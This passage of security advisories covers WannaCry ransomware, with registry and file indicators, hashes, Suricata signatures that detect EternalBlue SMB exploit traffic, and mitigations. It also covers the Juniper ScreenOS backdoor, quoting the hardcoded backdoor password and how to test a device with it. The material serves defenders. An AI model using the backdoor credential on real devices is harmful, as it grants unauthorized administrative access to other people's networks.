  • HKCU\Software\Microsoft\Windows\CurrentVersion\Run\[random] “[Installed_Folder]\tasksche.exe
  • HKCU\Software\WanaCrypt0r\
  • HKCU\Software\WanaCrypt0r\wd [Installed_Folder]
  • HKCU\Control Panel\Desktop\Wallpaper “[Installed_Folder]\Desktop\@WanaDecryptor@.bmp”

Email Subjects:

  • FILE_<5 numbers>
  • SCAN_<5 numbers>
  • PDF_<4 or 5 numbers>

Email Attachment:

  • nm.pdf

Surricata SIgnatures (https://github.com/xNymia/Suricata-Signatures/blob/master/EquationGroup.rules):

# EternalBlue Signature matching potential NEW installation of SMB payloadalert tcp $HOME_NET any -> any any (msg:”EXPLOIT Possible Successful ETERNALBLUE Installation SMB MultiplexID = 82 – MS17-010″; flow:from_server,established; content:”|FF|SMB|32 02 00 00 c0|”; offset:4; depth:9; content:”|52 00|”; distance:21; within:23; classtype:trojan-activity; sid:5000072; rev:1;)

# EternalBlue Signature matching return signature for connection to pre-installed SMB payloadalert tcp $HOME_NET any -> any any (msg:”EXPLOIT Successful ETERNALBLUE Connection SMB MultiplexID = 81 – MS17-010″; flow:from_server,established; content:”|FF|SMB|32 02 00 00 c0|”; offset:4; depth:9; content:”|51 00|”; distance:21; within:23; classtype:trojan-activity; sid:5000073; rev:1;)

# Signature to identify what appears to be initial setup trigger for SMBv1 – MultiplexID 64 is another unusual valuealert tcp $HOME_NET any -> any any (msg:”EXPLOIT Possible ETERNALBLUE SMB Exploit Attempt Stage 1/2 – Tree Connect AndX MultiplexID = 64 – MS17-010″; flow:to_server,established; content:”|FF|SMB|75 00 00 00 00|”; offset:4; depth:9; content:”|40 00|”; distance:21; within:23; flowbits: set, SMB.v1.AndX.MID.64; classtype:trojan-activity; sid:5000074; rev:1;)

# Signature triggers on Trans2 Setup Request with MultiplexID – 65 – Another unusual MID – Only triggers if 64 was seen previously. alert tcp $HOME_NET any -> any any (msg:”EXPLOIT Possible ETERNALBLUE SMB Exploit Attempt Stage 2/2 – Trans2 SUCCESS MultiplexID = 65 – MS17-010″; flow:to_server,established; content:”|FF|SMB|32 00 00 00 00|”; offset:4; depth:9;

Overview

On Friday, May 12th, an attack being made against the United Kingdom National Health Service (NHS) and the Spain- based telecommunications company, Telefonica, was made public. Reports now show that both companies have been hit with the WCrypt (WanaCrypt0r 2.0) crypto-ransomware. This attack is being perpetrated through the use of the recently leaked Eternal Blue exploit, belonging to the exploit kits released by the ShadowBrokers dump from the compromise of the National Security Agency (NSA). This exploit has been weaponized as a worm using a previously unpatched SMB vulnerability. This exploit has verified infections in the US as well. While data is still filtering in, early reports indicate FedEx is among the first US businesses compromised.

WCrypt Data

WCrypt is a standard crypto-ransomware which, once on the user’s system, encrypts the user’s files with the threat of deletion of the encryption keys if the user does not pay the ransom within seven days. With this variant, the ransom is demanded within 3 days or the ransom amount doubles, and within 7 days if the ransom isn’t paid, the encryption keys are deleted rendering all encrypted data unrecoverable.

Recognizing WCrypt Infections

The infection stems from a file named: wannacry.exe. The Hashes are located below:

SHA256:

  • 2ca2d550e603d74dedda03156023135b38da3630cb014e3d00b1263358c5f00d
  • 4a468603fdcb7a2eb5770705898cf9ef37aade532a7964642ecd705a74794b79
  • 09a46b3e1be080745a6d8d88d6b5bd351b1c7586ae0dc94d0c238ee36421cafa
  • 24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c
  • 2584e1521065e45ec3c17767c065429038fc6291c091097ea8b22c8a502c41dd

SHA1:

  • 45356a9dd616ed7161a3b9192e2f318d0ab5ad10
  • 51e4307093f8ca8854359c0ac882ddca427a813c

MD5:

  • 509c41ec97bb81b0567b059aa2f50fe8
  • 7bf2b57f2a205768755c07f238fb32cc
  • 7f7ccaa16fb15eb1c7399d422f8363e8

Once a system is infected with the ransomware, a screen similar to the following image appears informing the user of the infection as well as the ransom price and bitcoin address where the payment can be made.

WCrypt

The infection also typically spawns a large number of processes which are the result of the encryption process as well as the desktop theme changes and the decryptor listener.

Infection Vector: Eternal Blue

In the latest dump of the ShadowBroker’s exploits, Eternal Blue was considered especially dangerous due to its use of SMB v1 as the attack vector. This vulnerability was assigned the designation CVE-2017-0143, 0144, 0145, 0146, and 0147, it contains multiple avenues of attack and most Windows operating systems are vulnerable. This has been determined to be the method of infection from multiple sources, including Matthew Hickey, aka HackerFantastic, a reknown malware and security researcher. Of particular note is the presence of worm characteristics in the delivery. Once infected, the system becomes a part of the botnet for pushing the malware out.

Identifying Eternal Blue and the WCrypt Attack

A recently released screenshot, from malware researcher Kafiene, displays the traffic patterns for the Eternal Blue exploit.

Wcrypt Logs

As is evidenced in the image, most traffic is seen using port 445, whch is the standard port used by SMB v1 and v2. Network monitoring is essential to identify threats as they appear.

Mitigation

In order to mitigate this attack, it is recommended that:

  • All systems be updated to the latest patch available from Microsoft. The patch specific to the exploit kit is labeled KB4012598 or MS17-010 and should be evaluated for deployment immediately if it has not already been applied. This will prevent the SMB traffic from exploiting the vulnerability, and eliminates initial infection vectors.
  • Application whitelisting be applied to prevent any applications from running which are not from a specified location or signed by the whitelisted vendor.
  • You create and maintain offline backups of critical data which will reduce the amount of damage a crypto- ransomware attack is capable of inflicting.
  • You ensure your antivirus definitions are up to date. Most major anti-virus vendors have been provided samples of this malware and have developed detections and definitions. Currently, approximately 31 out of 60 A/V vendors tested can recognize and stop this infection. Major vendors not included in the list include Symantec and Sophos.

Matthew Hickey of Hacker House discovered the decryption binary in a zip file in the PE resources which is encrypted with the password of WNcry@2ol7. This can be used to potentially decrypt the files which were affected by the malware.

Final Analysis

The infections which have been occurring lead vSOC to believe these are not necessarily targeted attacks, rather the infection vectors are exploited automatically by the Eternal Blue exploit kit against vulnerable systems within the enterprise.

References:

Juniper ScreenOS Vulnerabilities Advisory for CVE-2015-7755 and CVE-2015-7756

Overview

Juniper issued a critical security bulletin on Friday December 18, 2015, stating that two distinct critical vulnerabilities were discovered during an ‘internal code review’. These vulnerabilities affect devices running ScreenOS 6.2.0r15 through 6.2.0r18 and 6.3.0r12 through 6.3.0r20, the Operating System that runs its popular NetScreen firewalls, which are widely used by organizations as a Next Generation Firewall and to provide VPN access.   The first vulnerability, CVE-2015-7755, allows an attacker to obtain unauthorized administrative remote access to the firewall. The second vulnerability, CVE-2015-7756, may allow an attacker to decrypt VPN traffic. Based on the versions impacted, these vulnerabilities have likely been in these products since late 2012.

On Sunday, December 20, 2015, Rapid7’s HD Moore released a blog post that identified an extra strcmp call in the vulnerable ScreenOS versions with an argument of <<< %s(un=’%s’) = %u, which is the backdoor password. This password allows an attacker to bypass authentication through SSH and Telnet, provided that they have a valid username.  According to Moore, if you want to test this issue on your Juniper devices, Telnet or SSH to a NetScreen device, specify a valid username and the backdoor password. If the device is vulnerable, you will receive an interactive shell with the highest privileges.

Impact

Because these vulnerabilities have the potential to provide administrative access to tens of thousands of devices that sit on the perimeter of organizations’ networks, as well as provide attackers with the ability to read encrypted traffic, their impact should be considered Critical and vulnerable systems should be patched immediately.

Identification

Unfortunately, identifying whether or not the authentication bypass vulnerability has been exploited in your network is non-trivial, given that any attacker who accessed the backdoor would also have privileges to delete the logs. However, Juniper did provide guidance on identifying a successful exploit. If your organization is leveraging a centralized logging solution or SIEM, you should be able to review the logs for potential intrusions.

GuidePoint is also advising our customers to look for consistent and persistent traffic originating from unfamiliar and atypical IP address ranges that could represent the attackers moving inside your network once they’ve gained access to the appliance. Additionally, Fox-IT has released a set of Snort rules that can detect access with the backdoor password over Telnet and detect any connection to a ScreenOS Telnet or SSH service.

https://gist.github.com/fox-srt/ca94b350f2a91bd8ed3f

Even worse, Juniper stated that there is currently no way to detect if the vulnerability that allows an attacker to decrypt VPN traffic has been exploited.

Remediation

Juniper has released updated versions of all impacted ScreenOS versions and GuidePoint is advising customer’s to upgrade any impacted devices as soon as possible. According to Juniper, “the following software releases have been updated to resolve these specific issues: ScreenOS 6.2.0r19, 6.3.0r21, and all subsequent releases. Additionally, earlier affected releases of ScreenOS 6.3.0 have been respun to resolve these issues. Fixes are included in: 6.3.0r12b, 6.3.0r13b, 6.3.0r14b, 6.3.0r15b, 6.3.0r16b, 6.3.0r17b, 6.3.0r18b, 6.3.0r19b. Finally, Juniper is recommending that customers restrict management access to only trusted management networks and hosts to limit the attack surface for the authentication bypass flaw.
GuidePoint Security is available to assist our customers with any remediation efforts. Please contact your Account Executive or click here for more details on how GuidePoint can help.

About GuidePoint Security

GuidePoint Security LLC provides customized, innovative and valuable information security solutions and proven cyber security expertise that enable commercial and federal organizations to successfully achieve their security and business goals. By embracing new technologies, GuidePoint Security helps clients recognize the threats, understand the solutions, and mitigate the risks present in their evolving IT environments. Headquartered in Herndon, Virginia, GuidePoint Security is a small business, and classification can be found with the System for Award Management (SAM). Learn more at: www.guidepointsecurity.com.